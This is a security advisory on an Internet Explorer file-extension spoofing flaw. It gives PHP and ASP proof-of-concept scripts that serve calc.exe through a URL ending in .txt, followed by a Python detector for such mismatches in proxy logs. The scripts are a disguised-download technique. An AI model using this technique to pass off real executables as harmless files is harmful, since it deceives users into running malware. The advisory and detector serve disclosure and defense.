Microsoft Internet Explorer Spoofable File Extensions Vulnerability
StatiC <static@tampabay.rr.com> submitted the following example to BugTraq:

With an apache/php server add .txt to the already existing .php extension in the apache.conf file, so that apache will recognise .txt extensions as php script files.

1. Copy the real windows calc.exe from a windows system to the html root dir.
2. Copy the readme.txt file below to the same html root dir.
3. go to the url http://yourserver/readme.txt

You will see the same behavior mentioned in the previous alert.

FILE <readme.txt> BEGIN ----
<?php
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=calc.exe");
readfile("calc.exe");
?>
FILE <readme.txt> END ----

"Jonathan G. Lampe" <jonathan@stdnet.com> submitted this example in ASP for IIS webservers:

<%
Const adTypeBinary = 1
Dim strFilePath
Response.ContentType = "application/octet-stream"
Response.AddHeader "Content-Disposition","attachment; filename=calc.exe"
strFilePath = Server.MapPath(".") & "\calc.exe"
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
objStream.Type = adTypeBinary
objStream.LoadFromFile strFilePath
Response.BinaryWrite objStream.Read
objStream.Close
Set objStream = Nothing
%>
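
Both submissions rely on the same mismatch: the URL suggests one file type while the Content-Disposition header names an executable. The following check for proxy or gateway logs is an added example, not code from the advisory or its submitters; the function names, the extension lists and the sample records (including download.asp) are assumptions constructed for illustration.

```python
import posixpath
from email.message import Message
from urllib.parse import unquote, urlsplit

# Assumed policy lists (not from the advisory); tune them for your environment.
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".hta", ".vbs"}
PASSIVE_EXTS = {".txt", ".htm", ".html", ".jpg", ".gif", ".png", ".pdf"}


def _ext(name):
    """Lower-cased extension of the last path component ('' if none)."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].strip()
    return posixpath.splitext(base)[1].lower()


def classify(url, headers):
    """Compare the extension in the URL with the filename the server announces.

    Returns "alert" when a passive-looking URL delivers an executable name,
    "review" for any other URL/filename mismatch ending in an executable
    extension (e.g. a download script), and "ok" otherwise.
    """
    msg = Message()
    for name, value in headers:
        msg[name] = value
    # Filename from Content-Disposition (falls back to Content-Type name=).
    served = msg.get_filename()
    if not served:
        return "ok"
    url_ext = _ext(unquote(urlsplit(url).path))
    served_ext = _ext(served)
    if served_ext not in EXECUTABLE_EXTS or served_ext == url_ext:
        return "ok"
    return "alert" if url_ext in PASSIVE_EXTS else "review"


# Constructed proxy records; the first mirrors the readme.txt example above.
ATTACH = [("Content-Type", "application/octet-stream"),
          ("Content-Disposition", "attachment; filename=calc.exe")]
SAMPLES = [
    ("http://yourserver/readme.txt", ATTACH),
    ("http://yourserver/download.asp", ATTACH),
    ("http://yourserver/tools/calc.exe", ATTACH),
    ("http://yourserver/notes.txt", [("Content-Type", "text/plain")]),
]

if __name__ == "__main__":
    for url, hdrs in SAMPLES:
        print(f"{classify(url, hdrs):6} {url}")
```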